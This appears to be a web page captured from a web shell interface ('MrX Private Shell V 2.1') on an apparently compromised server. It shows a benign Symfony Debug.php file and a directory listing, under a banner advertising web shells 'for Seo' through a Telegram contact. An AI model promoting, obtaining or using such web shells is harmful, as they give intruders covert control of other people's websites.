__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\ErrorHandler; /** * Registers all the debug tools. * * @author Fabien Potencier <[email protected]> */ class Debug { public static function enable(): ErrorHandler { error_reporting(\E_ALL & ~\E_DEPRECATED & ~\E_USER_DEPRECATED); if (!\in_array(\PHP_SAPI, ['cli', 'phpdbg', 'embed'], true)) { ini_set('display_errors', 0); } elseif (!filter_var(\ini_get('log_errors'), \FILTER_VALIDATE_BOOL) || \ini_get('error_log')) { // CLI - display errors only if they're not already logged to STDERR ini_set('display_errors', 1); } @ini_set('zend.assertions', 1); ini_set('assert.active', 1); ini_set('assert.exception', 1); DebugClassLoader::enable(); return ErrorHandler::register(new ErrorHandler(new BufferingLogger(), true)); } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Error | Folder | 0775 |
|
|
| ErrorEnhancer | Folder | 0775 |
|
|
| ErrorRenderer | Folder | 0775 |
|
|
| Exception | Folder | 0775 |
|
|
| Internal | Folder | 0775 |
|
|
| Resources | Folder | 0775 |
|
|
| BufferingLogger.php | File | 2.02 KB | 0664 |
|
| Debug.php | File | 1.09 KB | 0664 |
|
| DebugClassLoader.php | File | 48.41 KB | 0664 |
|
| ErrorHandler.php | File | 26.85 KB | 0664 |
|
| LICENSE | File | 1.04 KB | 0664 |
|
| ThrowableUtils.php | File | 865 B | 0664 |
|